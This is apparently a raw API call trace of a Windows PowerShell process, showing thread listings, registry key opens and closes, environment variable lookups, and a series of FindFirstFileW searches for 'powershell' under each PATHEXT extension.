	[0626.900] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xad9a0 | out: lpMode=0xad9a0) returned 1
	[0626.901] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0626.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.902] CoTaskMemFree (pv=0x20e0d0) 
	[0626.906] SetEvent (hEvent=0x2f8) returned 1
	[0626.906] SetEvent (hEvent=0x38c) returned 1
	[0626.906] SetEvent (hEvent=0x324) returned 1
	[0626.906] SetEvent (hEvent=0x2f4) returned 1
	[0626.906] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0626.909] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0626.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.909] CoTaskMemFree (pv=0x20e0d0) 
	[0626.910] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xad6f8 | out: phkResult=0xad6f8*=0x34c) returned 0x0
	[0626.910] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xad67c, lpData=0x0, lpcbData=0xad678*=0x0 | out: lpType=0xad67c*=0x0, lpData=0x0, lpcbData=0xad678*=0x0) returned 0x2

Thread:
	id = 402
	os_tid = 0x1034


Thread:
	id = 405
	os_tid = 0x1040


Thread:
	id = 821
	os_tid = 0x10c8


Thread:
	id = 827
	os_tid = 0xae0


Thread:
	id = 855
	os_tid = 0x1314


Thread:
	id = 884
	os_tid = 0x1734


Thread:
	id = 892
	os_tid = 0x2ac

	[0484.574] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0560.746] LocalFree (hMem=0x167290) returned 0x0
	[0560.746] CloseHandle (hObject=0x310) returned 1
	[0560.746] CloseHandle (hObject=0x13) returned 1
	[0560.747] CloseHandle (hObject=0xf) returned 1
	[0560.747] RegCloseKey (hKey=0x2fc) returned 0x0
	[0560.747] RegCloseKey (hKey=0x2f8) returned 0x0
	[0560.748] RegCloseKey (hKey=0x2f4) returned 0x0
	[0560.748] LocalFree (hMem=0x1672e0) returned 0x0
	[0560.748] RegCloseKey (hKey=0x324) returned 0x0
	[0583.863] RegCloseKey (hKey=0x2e4) returned 0x0
	[0597.541] RegCloseKey (hKey=0x2e4) returned 0x0
	[0615.772] RegCloseKey (hKey=0x388) returned 0x0
	[0615.772] RegCloseKey (hKey=0x384) returned 0x0
	[0615.773] RegCloseKey (hKey=0x360) returned 0x0
	[0615.773] RegCloseKey (hKey=0x39c) returned 0x0
	[0615.774] RegCloseKey (hKey=0x37c) returned 0x0
	[0615.774] RegCloseKey (hKey=0x378) returned 0x0
	[0615.774] RegCloseKey (hKey=0x374) returned 0x0
	[0615.775] RegCloseKey (hKey=0x370) returned 0x0
	[0615.775] RegCloseKey (hKey=0x36c) returned 0x0
	[0615.775] RegCloseKey (hKey=0x368) returned 0x0
	[0615.775] RegCloseKey (hKey=0x364) returned 0x0
	[0615.776] RegCloseKey (hKey=0x33c) returned 0x0
	[0615.776] RegCloseKey (hKey=0x398) returned 0x0
	[0615.776] RegCloseKey (hKey=0x394) returned 0x0
	[0615.776] RegCloseKey (hKey=0x35c) returned 0x0
	[0615.777] RegCloseKey (hKey=0x358) returned 0x0
	[0615.777] RegCloseKey (hKey=0x354) returned 0x0
	[0615.777] RegCloseKey (hKey=0x350) returned 0x0
	[0615.777] RegCloseKey (hKey=0x34c) returned 0x0
	[0615.778] RegCloseKey (hKey=0x348) returned 0x0
	[0615.778] RegCloseKey (hKey=0x344) returned 0x0
	[0615.778] RegCloseKey (hKey=0x340) returned 0x0
	[0615.778] RegCloseKey (hKey=0x390) returned 0x0
	[0615.779] RegCloseKey (hKey=0x330) returned 0x0
	[0615.779] RegCloseKey (hKey=0x32c) returned 0x0
	[0615.779] RegCloseKey (hKey=0x328) returned 0x0
	[0615.780] RegCloseKey (hKey=0x310) returned 0x0
	[0615.780] RegCloseKey (hKey=0x2fc) returned 0x0
	[0615.780] RegCloseKey (hKey=0x2f8) returned 0x0
	[0615.780] RegCloseKey (hKey=0x2f4) returned 0x0
	[0615.781] RegCloseKey (hKey=0x324) returned 0x0
	[0615.781] RegCloseKey (hKey=0x38c) returned 0x0
	[0615.781] RegCloseKey (hKey=0x2e4) returned 0x0
	[0641.239] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 935
	os_tid = 0x1900


Thread:
	id = 1239
	os_tid = 0x19b0

	[0627.810] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0627.815] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0627.820] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.820] CoTaskMemFree (pv=0x20e0d0) 
	[0627.822] VirtualQuery (in: lpAddress=0x1c5fdcc0, lpBuffer=0x1c5feb80, dwLength=0x30 | out: lpBuffer=0x1c5feb80*(BaseAddress=0x1c5fd000, AllocationBase=0x1bc70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0627.825] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.825] CoTaskMemFree (pv=0x20e0d0) 
	[0627.828] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.828] CoTaskMemFree (pv=0x20e0d0) 
	[0627.831] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.831] CoTaskMemFree (pv=0x20e0d0) 
	[0627.841] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.841] CoTaskMemFree (pv=0x20e0d0) 
	[0627.843] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.843] CoTaskMemFree (pv=0x20e0d0) 
	[0627.845] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.845] CoTaskMemFree (pv=0x20e0d0) 
	[0627.850] VirtualQuery (in: lpAddress=0x1c5fdf70, lpBuffer=0x1c5fee30, dwLength=0x30 | out: lpBuffer=0x1c5fee30*(BaseAddress=0x1c5fd000, AllocationBase=0x1bc70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0627.851] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.851] CoTaskMemFree (pv=0x20e0d0) 
	[0627.854] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.854] CoTaskMemFree (pv=0x20e0d0) 
	[0627.854] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.854] CoTaskMemFree (pv=0x20e0d0) 
	[0627.855] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0627.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.856] CoTaskMemFree (pv=0x20e0d0) 
	[0628.484] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0628.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.484] CoTaskMemFree (pv=0x20e0d0) 
	[0629.470] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0629.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.470] CoTaskMemFree (pv=0x20e0d0) 
	[0629.472] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0629.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.472] CoTaskMemFree (pv=0x20e0d0) 
	[0629.474] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0629.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.474] CoTaskMemFree (pv=0x20e0d0) 
	[0629.476] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0629.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.476] CoTaskMemFree (pv=0x20e0d0) 
	[0629.478] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0629.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.478] CoTaskMemFree (pv=0x20e0d0) 
	[0629.479] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0629.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.479] CoTaskMemFree (pv=0x20e0d0) 
	[0629.481] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0629.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.481] CoTaskMemFree (pv=0x20e0d0) 
	[0630.377] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0630.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0630.377] CoTaskMemFree (pv=0x20e0d0) 
	[0633.390] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0633.390] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0633.390] CoTaskMemFree (pv=0x20e0d0) 
	[0633.394] CoTaskMemAlloc (cb=0x104) returned 0x20e0d0
	[0633.394] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x20e0d0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0633.394] CoTaskMemFree (pv=0x20e0d0) 
	[0633.394] CoTaskMemAlloc (cb=0x128) returned 0x160500
	[0633.394] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x160500, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0633.394] CoTaskMemFree (pv=0x160500) 
	[0635.395] CoTaskMemAlloc (cb=0x20e) returned 0x1b7565e0
	[0635.395] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7565e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0635.395] CoTaskMemFree (pv=0x1b7565e0) 
	[0635.399] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0635.400] SetErrorMode (uMode=0x1) returned 0x1
	[0635.403] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0635.414] SetErrorMode (uMode=0x1) returned 0x1
	[0635.415] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0635.416] SetErrorMode (uMode=0x1) returned 0x1
	[0635.416] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0637.224] SetErrorMode (uMode=0x1) returned 0x1
	[0637.225] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0637.225] SetErrorMode (uMode=0x1) returned 0x1
	[0637.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0637.233] SetErrorMode (uMode=0x1) returned 0x1
	[0637.235] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0637.235] SetErrorMode (uMode=0x1) returned 0x1
	[0637.235] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0637.243] SetErrorMode (uMode=0x1) returned 0x1
	[0637.244] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0637.244] SetErrorMode (uMode=0x1) returned 0x1
	[0637.245] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0637.252] SetErrorMode (uMode=0x1) returned 0x1
	[0637.254] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0637.254] SetErrorMode (uMode=0x1) returned 0x1
	[0637.254] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0637.262] SetErrorMode (uMode=0x1) returned 0x1
	[0639.132] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0639.133] SetErrorMode (uMode=0x1) returned 0x1
	[0639.133] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0639.141] SetErrorMode (uMode=0x1) returned 0x1
	[0639.142] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0639.143] SetErrorMode (uMode=0x1) returned 0x1
	[0639.143] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0639.151] SetErrorMode (uMode=0x1) returned 0x1
	[0639.153] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0639.153] SetErrorMode (uMode=0x1) returned 0x1
	[0639.153] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0639.161] SetErrorMode (uMode=0x1) returned 0x1
	[0639.162] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0639.163] SetErrorMode (uMode=0x1) returned 0x1
	[0639.163] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0641.985] SetErrorMode (uMode=0x1) returned 0x1
	[0641.986] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0641.986] SetErrorMode (uMode=0x1) returned 0x1
	[0641.987] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0641.996] SetErrorMode (uMode=0x1) returned 0x1
	[0641.997] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0641.997] SetErrorMode (uMode=0x1) returned 0x1
	[0641.997] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0642.012] SetErrorMode (uMode=0x1) returned 0x1
	[0642.014] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0642.015] SetErrorMode (uMode=0x1) returned 0x1
	[0642.015] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.167] SetErrorMode (uMode=0x1) returned 0x1
	[0644.168] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0644.169] SetErrorMode (uMode=0x1) returned 0x1
	[0644.169] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.177] SetErrorMode (uMode=0x1) returned 0x1
	[0644.178] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0644.179] SetErrorMode (uMode=0x1) returned 0x1
	[0644.179] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
